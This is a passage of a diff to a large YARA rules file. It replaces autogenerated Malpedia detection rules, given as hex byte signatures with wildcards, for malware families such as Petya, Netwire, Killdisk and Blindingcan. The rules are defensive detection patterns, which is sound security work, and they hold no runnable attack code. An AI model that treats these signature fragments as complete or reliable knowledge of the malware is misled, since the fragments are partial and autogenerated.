8b4c2404 8908 83c01e 50 ff15???????? } - $sequence_95 = { 83a78c00000000 33c0 c3 51 e8???????? } - $sequence_96 = { 8b4036 85c0 75ec 8b442404 53 8a1e } - $sequence_97 = { 5f 5e 5b c20800 51 53 57 } - $sequence_98 = { e9???????? 83e908 74eb 2bcb 0f84fa000000 2bcb } - $sequence_99 = { a1???????? 6a00 e8???????? a1???????? 83c01e 50 ff15???????? } - $sequence_100 = { c3 33c0 483bc8 7458 488b5128 483bd0 } - $sequence_101 = { c9 c20800 55 8bec 81ec1c010000 8d4807 83e1f8 } - $sequence_102 = { 5b 8be5 5d c3 0fb708 6683f902 751c } - $sequence_103 = { 488bd8 488b05???????? f0834056ff 4885db 0f84ec000000 } - $sequence_104 = { ffd7 8b1d???????? 6a3a b8???????? 56 } - $sequence_105 = { 48895c2408 57 4883ec30 488bd9 488b0d???????? 488bfa 4883c12e } - $sequence_106 = { 488b15???????? 4c8d442468 48c7c101000080 ff15???????? } - $sequence_107 = { 83839c000000ff 397818 0f852ffcffff 33c0 } - $sequence_108 = { ff35???????? c74424200e440410 c744241c08000000 ffd6 8bf8 } - $sequence_109 = { e8???????? 8bf0 83fe0c 74c5 3bf3 0f8581020000 a1???????? } - $sequence_110 = { 8b831c70be03 3305???????? 8b3d???????? 50 33f6 56 8bef } - $sequence_111 = { c1e804 46 33048d1062be03 85ff } - $sequence_112 = { 7470 8b3d???????? 56 c7459c44000000 ffd7 8d45e8 50 } - $sequence_113 = { 397dfc 7417 a1???????? 8b55fc 354c4e4c7e 50 } - $sequence_114 = { e8???????? 3bc5 89442430 0f84ac010000 53 55 } - $sequence_115 = { 3934850875be03 742a 8d41ff 85c0 7c10 3934850875be03 7403 } - $sequence_116 = { 8b30 03f5 85f6 89b31c70be03 740a } - $sequence_117 = { 68???????? ffd6 a3???????? 33ff 8db7c4260410 } - $sequence_118 = { ff75ec 8b3d???????? 8bd8 ffd7 ff75e8 ffd7 eb08 } + $sequence_0 = { 49 85c9 0f8527ffffff ff75f8 } + $sequence_1 = { 49 75b6 8bcf 2b4d0c 83e103 } + $sequence_2 = { 83bdecfeffff01 7505 bb07000000 93 5b c9 c3 } + $sequence_3 = { aa ac 0ac0 740e 3c3d 740a e8???????? } + $sequence_4 = { 0345f4 8b8ba4000000 85c9 742b } + $sequence_5 = { ff7508 6a00 ff35???????? 58 ffd0 } + $sequence_6 = { 351f5b5742 ab 05f8383ad2 ab ff75fc } + $sequence_7 = { 59 85c0 75d1 83bb8000000000 7465 } + $sequence_8 = { 8d8614850010 50 ffb610850010 57 } + $sequence_9 = { 59 c3 56 8b742408 6804010000 68f8820010 } + $sequence_10 = { 330c85908f0010 42 3b54240c 72e4 f7d1 8bc1 } + $sequence_11 = { 57 8d3c95c0850010 8b0f 334f04 23cb } + $sequence_12 = { 330d???????? 5b 8bc1 83e001 d1e9 330c8500850010 330d???????? } + $sequence_13 = { 57 50 e8???????? 68f4600010 56 } + $sequence_14 = { 33d2 a3???????? 42 b9c0850010 8b01 c1e81e 3301 } + $sequence_15 = { 6800800010 ff742410 e8???????? 6823af2930 56 ff742410 } condition: - 7 of them and filesize <802816 + 7 of them and filesize <172032 } -rule MALPEDIA_Win_Anel_Auto : FILE +rule MALPEDIA_Win_Petya_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "77d9607f-3592-578d-9a57-0a9e2e4b1267" + id = "d9a77562-a232-5aff-a461-f3720889bdae" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.anel_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.petya_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "1c7f9ff41f497369b4973c110e6ba50d48e821bb90418969cf9b52dfa74f7f8e" + logic_hash = "e514cd58bfcd6e8ef482bd5780bb94df60b153546d27b2b89cfad52214dcb51a" score = 75 quality = 75 tags = "FILE" @@ -145254,32 +147996,32 @@ rule MALPEDIA_Win_Anel_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f7fe 43 3bd8 7621 8bd0 d1ea be91cfba01 } - $sequence_1 = { eb24 8bca 83e910 3b5904 7f17 7c07 } - $sequence_2 = { 8bf9 2bf8 85c0 7411 eb03 83c010 3bc1 } - $sequence_3 = { c645fc06 e8???????? c645fc07 8bc8 c645fc08 e8???????? 8bc6 } - $sequence_4 = { 897814 895810 89458c 8818 8d4678 } - $sequence_5 = { c1e704 037d08 a5 a5 a5 a5 5f } - $sequence_6 = { 53 33ff c645fc00 e8???????? 837d1c08 8b4508 7303 } - $sequence_7 = { 8bec 51 56 8bf0 33c0 894610 c746140f000000 } - $sequence_8 = { 8d8bd0000000 50 8d55d8 c645fc01 e8???????? 6a01 33ff } - $sequence_9 = { e8???????? 8bd6 8d8dc8feffff c645fc01 e8???????? c645fc02 83bd04ffffff05 } + $sequence_0 = { 6a03 6800001080 51 ff15???????? 83f8ff } + $sequence_1 = { 57 33ff 3b750c 0f47d9 85db 7410 8b06 } + $sequence_2 = { 0f42f2 6a04 56 e8???????? 8bd8 } + $sequence_3 = { 8bc6 8bca c1e303 0facc110 897c2424 c1e810 } + $sequence_4 = { 8d4e1c e8???????? 8d4e28 e8???????? 8d4e4c e8???????? 837e7400 } + $sequence_5 = { 83e804 4e 75f5 46 3bf2 53 } + $sequence_6 = { 8b4e74 03cb e8???????? 47 83c324 3b7e78 72ed } + $sequence_7 = { 85db 7410 8b06 85c0 7402 ffd0 } + $sequence_8 = { 0fa4df03 c1e818 884c242c 8bc6 } + $sequence_9 = { 8d4e04 e8???????? 8d4e10 e8???????? 8d4e1c } condition: - 7 of them and filesize <376832 + 7 of them and filesize <229376 } -rule MALPEDIA_Win_Netwire_Auto : FILE +rule MALPEDIA_Win_Blindingcan_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7e349eff-bed6-58da-b13d-023150840eee" + id = "cb880a40-09fd-57de-a5ce-976bc164d187" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.netwire_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blindingcan_auto.yar#L1-L180" license_url = "N/A" - logic_hash = "d56dccb0a24c96c7c7e1e50a683192f0a074d28ee0f4b72f3b3f8446384ae89a" + logic_hash = "7d6669fb427721c8bcc6cd766a15275abac3a422e034ffec946a676b43de9099" score = 75 quality = 75 tags = "FILE" @@ -145293,32 +148035,38 @@ rule MALPEDIA_Win_Netwire_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c7042449000000 e8???????? c7042446000000 e8???????? c7042400000000 e8???????? } - $sequence_1 = { c7042401000080 e8???????? c7042410000000 e8???????? } - $sequence_2 = { c744240c00000000 c744240800000000 c744240400000000 c7042408000000 e8???????? 83ec14 } - $sequence_3 = { 740c c7042400000000 e8???????? c70424???????? e8???????? } - $sequence_4 = { e8???????? a3???????? c7042440000000 e8???????? } - $sequence_5 = { c70424d0070000 e8???????? e9???????? e8???????? } - $sequence_6 = { c744241000000000 c744240c00000000 c744240800000000 c744240400000000 c7042408000000 e8???????? 83ec14 } - $sequence_7 = { c744242c00000000 c744242800000000 c744242400000000 c7442420fdffffff c744241c00000000 c744241800000000 } - $sequence_8 = { c7042400000000 e8???????? c70424???????? e8???????? } - $sequence_9 = { e8???????? eb11 c7042496000000 e8???????? } + $sequence_0 = { 83c40c 68???????? 68???????? ff15???????? 689c040000 85c0 } + $sequence_1 = { 750a 8b10 8994bdfcfdffff 47 83c00c 49 } + $sequence_2 = { c785bcfdffff661fcba8 c785c0fdffffc0f0d181 c785c4fdffff1f08c3d4 c785c8fdffff28edbc6a c785ccfdffff12aff210 } + $sequence_3 = { c745e4ef0dfff5 c745e85acd9c1d c745ec36c2f964 c745f0a70d9fae c745f48f2aedf1 } + $sequence_4 = { c78594feffff657f9183 c78598feffffa78b5b05 c7859cfeffff87f53e0c c785a0feffff074f9b22 } + $sequence_5 = { c745ac84b1df57 c745b0c8cbfee9 c745b4567e337f c745b8e958e686 } + $sequence_6 = { c78548feffffdfc2f62c c7854cfeffff17516633 c78550fefffff76c7e7e c78554feffffa14b0c27 c78558feffff10c0aac6 c7855cfeffff489a8471 c78560feffff9cab4ad6 } + $sequence_7 = { 740c a810 7408 c68435a8fcffff01 46 83fe1a } + $sequence_8 = { f7fe 8bca e8???????? 85c0 7409 e8???????? } + $sequence_9 = { 55 4154 4155 488da8e8f3ffff 4881ec000d0000 488b05???????? 4833c4 } + $sequence_10 = { 8bd5 664489642422 6689442420 895c2428 e8???????? 8bd3 488bcf } + $sequence_11 = { 85c0 751b e8???????? 4885c0 7461 448bc7 488d55c0 } + $sequence_12 = { 81e909200000 746e 83e907 745f ffc9 744d ffc9 } + $sequence_13 = { 410fb6c4 0fb68c2810be0100 41335518 400fb6c6 0fb6842810be0100 c1e108 33c8 } + $sequence_14 = { 488b4dc8 488d45c0 4c8d4db0 4889442428 488d0552d30100 488d1586340100 4533c0 } + $sequence_15 = { ff15???????? 4883ceff 4c8be8 4889442440 483bc6 752d ff15???????? } condition: - 7 of them and filesize <416768 + 7 of them and filesize <363520 } -rule MALPEDIA_Win_7Ev3N_Auto : FILE +rule MALPEDIA_Win_Pseudo_Manuscrypt_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cf231267-d18f-5fab-bbdf-ab3bf00ba51c" + id = "31787da1-ee36-51da-9ab0-837844c74a17" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.7ev3n_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pseudo_manuscrypt" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pseudo_manuscrypt_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "3d3793244c4ff8a9f87ce7ce50051977c17fdc03ef0f8a315973a688f14f4ceb" + logic_hash = "f95219f8df4fada7a5809becd0c4a0a18721619c73177d4ad9f3ddc17aca2388" score = 75 quality = 75 tags = "FILE" @@ -145332,32 +148080,32 @@ rule MALPEDIA_Win_7Ev3N_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8dd0cdffff e8???????? 8bce 2bcf 3bc1 0f8402b10000 } - $sequence_1 = { 8bd4 89a50cf9ffff c7421407000000 c7421000000000 668902 66398560ffffff 7504 } - $sequence_2 = { 894104 a0???????? 884108 6a00 8d8504ffffff 50 } - $sequence_3 = { c785e4fdffff00000000 6a00 c785e0fdffffd0a54500 ff15???????? 33c0 c705????????07000000 } - $sequence_4 = { 8d85acefffff 50 8d8dd0cdffff e8???????? 8bce 2bcf } - $sequence_5 = { 6a00 8d85fcfeffff 50 8d8dd0cdffff e8???????? 8bce 2bcb } - $sequence_6 = { 8dbd38f1ffff 8d4f02 0f1f840000000000 668b07 83c702 6685c0 75f5 } - $sequence_7 = { 8b0c8d20934500 80643128fd 5f 5e 8be5 5d c3 } - $sequence_8 = { f30f7e05???????? 660fd68564e6ffff 0fb705???????? 6689856ce6ffff f30f7e05???????? 660fd68558e6ffff 0fb705???????? } - $sequence_9 = { 0f84724c0000 8dbda0ddffff 8d4f02 0f1f840000000000 668b07 83c702 6685c0 } + $sequence_0 = { 0f8473ffffff 8bd6 8bcf e8???????? 85c0 0f8f62ffffff 53 } + $sequence_1 = { 668906 e8???????? 8b45fc 83c404 8bfb 3b18 75bd } + $sequence_2 = { 33db 8d857cfdffff 53 50 53 683f010f00 53 } + $sequence_3 = { 6a00 6a00 6a00 6a18 ffd6 6a00 6a00 } + $sequence_4 = { 8bec 56 8bb17c010000 85f6 742a 8b4508 33d2 } + $sequence_5 = { 6a04 68ffff0000 53 ffd6 0bc7 5f 5e } + $sequence_6 = { 57 8945fc 8d140b 8bc8 0f44d3 52 e8???????? } + $sequence_7 = { 7554 5f 33c0 5e 8b4dfc 33cd e8???????? } + $sequence_8 = { 89442474 8d842480000000 6804010000 50 c744246c01010000 ff15???????? 68???????? } + $sequence_9 = { 8d85d0fdffff 50 56 ff15???????? 85c0 742c 53 } condition: - 7 of them and filesize <803840 + 7 of them and filesize <753664 } -rule MALPEDIA_Win_Lazarloader_Auto : FILE +rule MALPEDIA_Win_Nim_Blackout_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "eeec4f28-0f22-51be-ae2e-de44f3255986" + id = "5ee8f0fb-bcc5-57f1-899f-f87f9c8f8cd3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lazarloader_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nim_blackout" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nim_blackout_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "2c7bcf20b8b4c12e652b091953d52f7cafa589f18b8b9e18e7eefdba4a60b648" + logic_hash = "38658558791a84132e6c1e0a028a41bbfaac44e317840b869e572ec902a09080" score = 75 quality = 75 tags = "FILE" @@ -145371,32 +148119,32 @@ rule MALPEDIA_Win_Lazarloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 483b0d???????? 7417 488d059c4f0100 483bc8 } - $sequence_1 = { 7528 48833d????????00 741e 488d0d30a80100 e8???????? 85c0 740e } - $sequence_2 = { 8bc2 488d154241ffff c1e803 89442438 448be0 89442440 85c0 } - $sequence_3 = { 488d0563810000 488bd9 483bc8 7417 8b815c010000 } - $sequence_4 = { 4889542410 48894c2408 57 4881ece0080000 33c0 66898424a0000000 488d8424a2000000 } - $sequence_5 = { 4c8bea 4b8b8cf770c10100 4c8b15???????? 4883cfff 418bc2 498bd2 4833d1 } - $sequence_6 = { 8bcf e8???????? 488bd7 4c8d05fecd0000 83e23f 488bcf 48c1f906 } - $sequence_7 = { 48897018 48897820 4156 33ed 4c8d35e6900000 448bd5 488bf1 } - $sequence_8 = { e8???????? 488bd7 4c8d05fecd0000 83e23f } - $sequence_9 = { 488bda 4c8d0d6bad0000 8bf9 488d15a2930000 b906000000 } + $sequence_0 = { 4889c8 83e001 84c0 7405 e8???????? 488b45f0 4885c0 } + $sequence_1 = { 48c7401800000000 e9???????? 90 48c745e0c6000000 488d057d5c0200 488945e8 } + $sequence_2 = { 488d057ad80000 488905???????? 488d05d85b0200 488905???????? c605????????01 48c705????????60000000 } + $sequence_3 = { e8???????? 48c745e0e7000000 488d05c37e0200 488945e8 488b4510 488b00 ba08000000 } + $sequence_4 = { e9???????? 90 48c785a800000000000000 48c785a000000000000000 48c7450088010000 488d05885b0100 48894508 } + $sequence_5 = { 488945c8 488b4de8 488b55e0 4889d0 4801c0 4801d0 48c1e003 } + $sequence_6 = { 488b1402 4889c8 4801c0 4801c8 48c1e004 4889c1 } + $sequence_7 = { 488d0542460200 488945c8 488b4510 488b55f8 4889d1 48c1e105 488b55f0 } + $sequence_8 = { 488b4588 488945f0 eb49 90 48c745d033000000 488d05f48e0100 488945d8 } + $sequence_9 = { 48894508 48c785f800000000000000 48c7450084010000 488d05bf5c0100 48894508 4883bdf000000000 0f84ff000000 } condition: - 7 of them and filesize <364544 + 7 of them and filesize <1068032 } -rule MALPEDIA_Win_Hacksfase_Auto : FILE +rule MALPEDIA_Win_Zenar_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "efd0a25a-4cca-56d9-81da-25a62e74a476" + id = "4a5b8e75-0846-5f97-8625-2c49ccc878e4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hacksfase_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zenar" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zenar_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "cb98da9c56e02049453f68129b331881a66f9a471f383d0aefdbab19d12d9c15" + logic_hash = "aaf8e2aaae847a92d9529fc5af1d76e9bd4aae4fdb4d807ed83b4a0145bc159f" score = 75 quality = 75 tags = "FILE" @@ -145410,32 +148158,32 @@ rule MALPEDIA_Win_Hacksfase_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 81ec1c080000 53 55 56 57 6a1c 32db } - $sequence_1 = { 897ddc 8b45d0 03c0 8945d0 8d4dd0 51 } - $sequence_2 = { 53 51 ff7628 895dbc 895dc4 895dc0 895dc8 } - $sequence_3 = { 895008 8b4120 8b5508 895020 8b4120 } - $sequence_4 = { 85c0 7509 b908000000 8bfb } - $sequence_5 = { a806 746c b9???????? c78424bc02000003000000 c78424c002000002000000 c78424c4020000ffffffff c78424b802000010000000 } - $sequence_6 = { ffd6 85c0 740a 33c0 5e 81c490010000 } - $sequence_7 = { 83ec18 8b4120 56 33f6 } - $sequence_8 = { 89842418040000 e8???????? b9???????? e8???????? } - $sequence_9 = { ff75f0 ffd7 6a18 e8???????? } + $sequence_0 = { 85c0 7409 83c024 50 8b08 ff5108 8b4df4 } + $sequence_1 = { 8bf1 8d8e80020000 e8???????? 8d8e68020000 e8???????? 8bce 5e } + $sequence_2 = { 8bc7 8bcf 83e03f c1f906 6bf038 03348d98ae4300 } + $sequence_3 = { 8d8d70ffffff c645fc03 e8???????? 84c0 7406 8ac3 } + $sequence_4 = { 8bfe 83e03f c1ff06 6bd838 8b04bd98ae4300 f644032801 7444 } + $sequence_5 = { 55 8bec 0fb701 83ec10 83e811 741a 83e801 } + $sequence_6 = { 8d4d0c ff7514 8b7d08 8945f8 897314 } + $sequence_7 = { 8b4dfc 0f95c0 890a c9 c20c00 55 8bec } + $sequence_8 = { 837d0c04 0f85e3000000 8d4634 50 8d4dc8 e8???????? } + $sequence_9 = { eb07 8b4584 8930 33db 8d4dd4 e8???????? } condition: - 7 of them and filesize <106496 + 7 of them and filesize <519168 } -rule MALPEDIA_Win_Killdisk_Auto : FILE +rule MALPEDIA_Win_Mqsttang_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fd586ea1-d41c-50af-ab00-4c3fd6d8b593" + id = "37b83f83-ada9-5cb9-9846-c597be16b8c2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.killdisk_auto.yar#L1-L172" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mqsttang" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mqsttang_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "5e0faf26e496f52d500cc74a0d402009c944ca198565834d2511070577fb34d3" + logic_hash = "816bebdcfc28d4925b60f084aa814ab97a3079e189efd77c5fe0d0005fa07653" score = 75 quality = 75 tags = "FILE" @@ -145449,38 +148197,32 @@ rule MALPEDIA_Win_Killdisk_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4604 7204 8b08 eb02 8bc8 66891c51 } - $sequence_1 = { 0f8424020000 8d4c245c b8???????? 8d642400 668b10 } - $sequence_2 = { 881438 e8???????? 9c c6442408cf 894508 e9???????? } - $sequence_3 = { 88742408 c70424ba7bbfa4 660fbae408 662dca11 e8???????? 881438 e8???????? } - $sequence_4 = { 83c40c 68???????? 68e08fc201 e8???????? 8bf0 } - $sequence_5 = { 8f44241c c64424148e c644240426 e8???????? 4e e8???????? 54 } - $sequence_6 = { c3 50 ff15???????? 8b8c24d41a0000 } - $sequence_7 = { 872d???????? 0fc1c2 89e2 66d3c9 66d3c0 } - $sequence_8 = { e8???????? 84c0 751a a1???????? 50 6802000080 } - $sequence_9 = { b001 5e 59 c3 837f1800 7413 } - $sequence_10 = { e8???????? 83c420 6a00 8d442414 } - $sequence_11 = { 46 66892c24 9c 8d64244c e9???????? 9c 9c } - $sequence_12 = { 9c 8d642430 e9???????? ff742404 66894500 } - $sequence_13 = { 8d642454 e9???????? 880424 8774242c 9c 68a12348dd e8???????? } - $sequence_14 = { 66897c240c 882c24 c64424044f 8d642454 e9???????? } - $sequence_15 = { 56 e8???????? c1f805 56 8d3c85a098c201 } + $sequence_0 = { f20f2ac0 f20f5905???????? 660f28c8 660f54ca 660f2ed9 7629 f20f58cb } + $sequence_1 = { f0832801 8b85c0fdffff 0f845a010000 8b85b4fdffff 89780c 8b400c 85c0 } + $sequence_2 = { e9???????? 89c7 89d9 89fb e8???????? 89f1 e8???????? } + $sequence_3 = { ff5074 8b03 83ec04 89d9 8b707c ff5078 890424 } + $sequence_4 = { e9???????? c74424240a030000 c744242001000000 e9???????? c74424240b030000 c744242000000000 e9???????? } + $sequence_5 = { e8???????? e9???????? c744240405000000 c70424???????? e8???????? 8d5de4 8b4dd4 } + $sequence_6 = { e8???????? 8d4c247c e8???????? 8d8c2480000000 e8???????? 8d8c2484000000 e8???????? } + $sequence_7 = { f6040e10 7441 83c002 47 894338 39bdd8aeffff 77c7 } + $sequence_8 = { f30f11442430 f20f115c2428 f30f11542420 f30f114c2418 e8???????? f20f106c2438 f20f105c2428 } + $sequence_9 = { e9???????? c744240cffffffff c7442408???????? 89542404 03400c 890424 e8???????? } condition: - 7 of them and filesize <10817536 + 7 of them and filesize <12651520 } -rule MALPEDIA_Win_Qhost_Auto : FILE +rule MALPEDIA_Win_Banatrix_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5a22ec0c-4f17-55ab-b241-2378f7015545" + id = "dddc42c8-ebb5-5b25-8e19-698be8f181ff" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.qhost_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.banatrix_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "c30effbf965ec02215e2576b89ba366bebeed097f08848009dcc3ab3b7556ec0" + logic_hash = "ad75928262b7ab312e9d49af768e2651c88b8c026115565bb62125e134a2e0bd" score = 75 quality = 75 tags = "FILE" @@ -145494,32 +148236,32 @@ rule MALPEDIA_Win_Qhost_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c60000 8b4dfc 83e901 894dfc ebdc 8b4508 } - $sequence_1 = { 40 884598 8b0d???????? 51 e8???????? } - $sequence_2 = { ff15???????? 898550beffff c78538beffff00000000 837df400 } - $sequence_3 = { 7507 b805000080 eb36 8b5508 52 68???????? e8???????? } - $sequence_4 = { 03d0 52 ff15???????? 83c408 } - $sequence_5 = { 68???????? 68???????? 68ff030000 68???????? ff15???????? 83c410 } - $sequence_6 = { 837df800 0f84dc000000 c7854cbeffff00000000 c78550beffff00000000 eb1e } - $sequence_7 = { 68???????? 680f270000 68???????? ff15???????? 83c410 ff15???????? } - $sequence_8 = { 8bec 81ec6c0b0000 c785f0fdffff00000000 c785e8fdffff00000000 c785d4fdffff00000000 c745fc00000000 c785f4fdffff00000000 } - $sequence_9 = { 50 6800040000 8d8d00fcffff 51 8b95c8fbffff 52 } + $sequence_0 = { 83ec10 894208 89f7 31c0 f3aa } + $sequence_1 = { e8???????? 8b4304 85c0 741b c744240800800000 c744240400000000 } + $sequence_2 = { c744240806000000 893c24 c1e804 40 0fb7c0 } + $sequence_3 = { 8b5320 0345d0 89542404 890424 } + $sequence_4 = { e9???????? e8???????? c744240824000000 c744240400000000 } + $sequence_5 = { 51 c9 c3 55 89e5 57 } + $sequence_6 = { 83ec10 85c0 8945d4 7542 8b45d0 c744240c04000000 c744240800300000 } + $sequence_7 = { 8b75d0 8b7dd4 2b7e34 897dcc 7514 8b7304 } + $sequence_8 = { 83787c00 7511 c704247f000000 e8???????? 31c0 51 eb66 } + $sequence_9 = { 85c0 56 56 7416 8b03 c745d000000000 } condition: - 7 of them and filesize <286720 + 7 of them and filesize <180224 } -rule MALPEDIA_Win_Bouncer_Auto : FILE +rule MALPEDIA_Win_Xxmm_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "87d70146-e2c3-5ac4-84a7-b98c5e250ffd" + id = "2f4f20e9-d761-523e-a241-a1e4f366495b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bouncer_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xxmm_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "5df724a9e6c42e3be58b79859bcd4fd49abf6f303058e1f4cc9822918e05c24a" + logic_hash = "0f663d162fed444e7f08fa4fe0acf57f92808d6dc37ba8437dff740dddaf561a" score = 75 quality = 75 tags = "FILE" @@ -145533,34 +148275,34 @@ rule MALPEDIA_Win_Bouncer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 be???????? 83ec34 6a0d 59 8bfc } - $sequence_1 = { a1???????? 56 3bc3 7422 } - $sequence_2 = { 8dbda6f8ffff 33f6 f3ab 66ab 6a1e 8d45a8 56 } - $sequence_3 = { e8???????? 83c414 397e18 0f85ce020000 3bc3 7d50 33c9 } - $sequence_4 = { 3bc3 0f84870e0000 50 ff15???????? } - $sequence_5 = { 8bec 81ec14040000 53 56 57 6a40 ff15???????? } - $sequence_6 = { 8d8534ffffff 57 50 e9???????? } - $sequence_7 = { 56 be???????? 57 56 e8???????? 8bd8 c7042499050000 } - $sequence_8 = { 8945d0 0f8e740e0000 8d85a0fcffff 50 ff75fc e8???????? } - $sequence_9 = { 897db0 8975c4 ff750c 8975bc 8975c0 } + $sequence_0 = { 6a00 ff15???????? 53 57 50 8945fc e8???????? } + $sequence_1 = { 6a00 ff55ec ff7650 8bf8 } + $sequence_2 = { 8b7c0e20 8b440e24 03f9 03c1 } + $sequence_3 = { 897d10 3bdf 7673 8b4508 2bc6 } + $sequence_4 = { c3 55 8bec 51 51 8b03 8b08 } + $sequence_5 = { 0f84bc000000 397d10 0f84b3000000 3bf7 } + $sequence_6 = { 034df8 83c0f8 d1e8 8d7a08 897df4 7450 } + $sequence_7 = { 0fb74606 8945e8 85c0 7429 8b47f8 } + $sequence_8 = { 3b7114 7303 8bc6 c3 53 0fb75806 57 } + $sequence_9 = { 41 4a 75f7 8b5dfc 83c728 837de800 75d7 } condition: - 7 of them and filesize <335872 + 7 of them and filesize <540672 } -rule MALPEDIA_Win_Gazer_Auto : FILE +rule MALPEDIA_Win_Sisfader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4f697767-8c05-5c0d-bde5-d6a7fdfb5341" + id = "1937373c-a869-5de8-8c47-c30db9548d3e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gazer_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sisfader_auto.yar#L1-L291" license_url = "N/A" - logic_hash = "9d7c4a164f0a9c13470f23ca334f1d2575ebac4454f4b53ffe47ee33d23ce84e" + logic_hash = "288baaa87a5a9f6675c09b00537afbaf23a5deab091befb8544155fddb8ada09" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -145572,32 +148314,52 @@ rule MALPEDIA_Win_Gazer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7511 e8???????? 84c0 7508 } - $sequence_1 = { 85c0 7511 e8???????? 84c0 7508 83c8ff e9???????? } - $sequence_2 = { 85c0 7511 